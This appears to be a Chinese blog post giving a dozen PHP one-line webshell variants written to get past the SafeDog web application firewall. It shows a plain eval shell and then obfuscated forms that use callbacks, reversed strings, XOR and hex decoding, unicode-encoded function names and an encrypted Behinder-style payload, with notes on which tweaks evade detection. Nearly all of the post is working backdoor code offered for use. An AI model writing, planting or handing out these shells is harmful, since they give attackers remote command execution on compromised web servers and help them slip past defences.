php一句话马变形bypass安全狗技巧

前言:变形绕过安全狗的方法

普通一句话

<?php eval($_POST[cmd])?>

变形一:函数调用

<?php
function fucksafedog($a,$b){
 eval($a);
}
fucksafedog($_POST[cmd],'这是一个bypass示例');
?>

此方法第二个参数$b,并没有实际意义,只是用来干扰,不加会被杀

<?php $st=@create_function('',$_GET['cmd']);$st();?>

变形二:回调

<?php
$newfunc = create_function('', "$_POST[cmd];");
$newfunc();
?>

第二个参数这里加了双引号,加了就过狗,不加就不过

变形三: array_map 变形

<?php
array_map(strrev(substr('fucksafedog.cntressa', 8)),$_POST);
?>

此变形传值的时候,首先是截取,然后再反转可,以直接菜刀连接,密码任意,这里接受的是$_POST数组,所以,传什么都可以。

变形四:call_user_func

<?php
call_user_func(strrev(substr("fucksafedog.cn|tressa",9)),$_POST[cmd]);
?>

这个变形和上个变形类似,但是不同的地方,必须指定密码,否则不执行。

变形五:array_filter

<?php
$a = $_POST[cmd]; 
$arr = array($a); 
array_filter($arr,'a'.'s'."serT");
?>

变形六:array_udiff_assoc

<?php
$password="cmd";
array_udiff_assoc(array($_REQUEST[$password]),array(1),"assert");
?>

这里变形注意PHP版本(php 5 > = 5 . 4 . 0 , php 7 )

变形七:array_intersect_ukey

第一个

<?php
$password="cmd";
$ch=explode(".","hello.ass.world.er.t");
register_shutdown_function($ch[1].$ch[3].$ch[4],$_REQUEST[$password]);
?>

第二个

<?php
$password="cmd";
$ch=explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password]=>1),array(1),
$ch[1].$ch[3].$ch[4]);
?>

变形八:rename

<?php
$password="cmd";
${"cmd"}=substr(__FILE__,-5,-4)."class";
$f=$cmd ^ hex2bin("12101f040107");
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>

变形九:异或

<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$key."Land!";
$trick=array(
"0"=>"51","1"=>"50","2"=>"53","3"=>"52","4"=>"55","5"=>"54","6"
=>"57","7"=>"56","8"=>"59",
"9"=>"58","a"=>"00","b"=>"03","c"=>"02","d"=>"05","e"=>"04","f"
=>"07","g"=>"06","h"=>"09",
"i"=>"08","j"=>"0b","k"=>"0a","l"=>"0d","m"=>"0c","n"=>"0f","o"
=>"0e","p"=>"11","q"=>"10",
"r"=>"13","s"=>"12","t"=>"15","u"=>"14","v"=>"17","w"=>"16","x"
=>"19","y"=>"18","z"=>"1b",
"A"=>"20","B"=>"23","C"=>"22","D"=>"25","E"=>"24","F"=>"27","G"
=>"26","H"=>"29","I"=>"28",
"J"=>"2b","K"=>"2a","L"=>"2d","M"=>"2c","N"=>"2f","O"=>"2e","P"
=>"31","Q"=>"30","R"=>"33",
"S"=>"32","T"=>"35","U"=>"34","V"=>"37","W"=>"36","X"=>"39","Y"
=>"38","Z"=>"3b",
);
$f=pack("H*",$trick[$key]."3f120b1655")^$key."Land!";
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>

变形十:文件名最后字母为r

<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$key."Land!";
$f=pack("H*","13"."3f120b1655")^$LandGrey;
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>

此外携带请求头 Accept: r也可

<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$_SERVER["HTTP_ACCEPT"]."Land!";
$f=pack("H*","13"."3f120b1655")^$LandGrey;
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>

变形十一:unicode

<?php
@error_reporting(0);
session_start();


//unicode解码函数
function xx($unicode_str){
	$json = '{"str":"'.$unicode_str.'"}';
	$arr = json_decode($json,true);
	if(empty($arr)) return '';
	return $arr['str'];}


if (isset($_GET['pass']))
{
//调用解码函数返回原函数字符
	$key=xx("u0073u0075u0062u0073u0074u0072")(xx("u006du0064u0035")(xx("u0075u006eu0069u0071u0069u0064")(xx("u0072u0061u006eu0064")())),16);
	$_SESSION['k']=$key;
	print $key;
}

else
{
	$key=$_SESSION['k'];
	$post=xx("u0066u0069u006cu0065u005fu0067u0065u0074u005fu0063u006fu006eu0074u0065u006eu0074u0073")(xx("u0070u0068u0070u003au002fu002fu0069u006eu0070u0075u0074"));
	if(!xx("u0065u0078u0074u0065u006eu0073u0069u006fu006eu005fu006cu006fu0061u0064u0065u0064")('openssl'))
	{
		$t=xx("u0062u0061u0073u0065u0036u0034u005f").xx("u0064u0065u0063u006fu0064u0065");
		$post=$t($post."");for($i=0;$i<xx("u0073u0074u0072u006cu0065u006e")($post);$i++) {
		
		$post[$i] = $post[$i]^$key[$i+1&15];
	}
}
else
{
	$post=xx("u006fu0070u0065u006eu0073u0073u006cu005fu0064u0065u0063u0072u0079u0070u0074")($post,xx("u0041u0045u0053u0031u0032u0038"), $key);}$arr=xx("u0065u0078u0070u006cu006fu0064u0065")('|',$post);
	$func=$arr[0];
	$params=$arr[1];

class C{public function __invoke($p) {eval($p."");}}
	@xx("u0063u0061u006cu006cu005fu0075u0073u0065u0072u005fu0066u0075u006eu0063")(new C(),$params);
}
?>

变形十二:callback

<?php @header_register_callback($_GET['cmd']);?>

 

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注